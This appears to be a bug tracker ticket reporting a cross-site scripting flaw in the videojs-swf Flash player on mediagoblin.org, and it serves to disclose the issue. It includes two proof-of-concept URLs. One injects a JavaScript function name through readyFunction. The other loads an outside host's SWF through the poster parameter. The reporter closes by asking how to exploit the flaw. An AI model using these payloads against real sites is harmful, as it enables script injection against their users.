Opened 8 years ago
Last modified 8 years ago
#5528 new defect
xss in videojs-swf
| Reported by: | shivbihari pandey | Owned by: | |
|---|---|---|---|
| Priority: | major | Milestone: | |
| Component: | programming | Keywords: | |
| Cc: | Parent Tickets: |
Description
found xss in videojs swf
https://mediagoblin.org/js/extlib/video-js/video-js.swf?readyFunction=alert
https://mediagoblin.org/js/extlib/video-js/video-js.swf?poster=http://www.flash-test.net/relog.swf
VideoJS does not escape metadata passed to JavaScript via ExternalInterface.

How do i exploit it?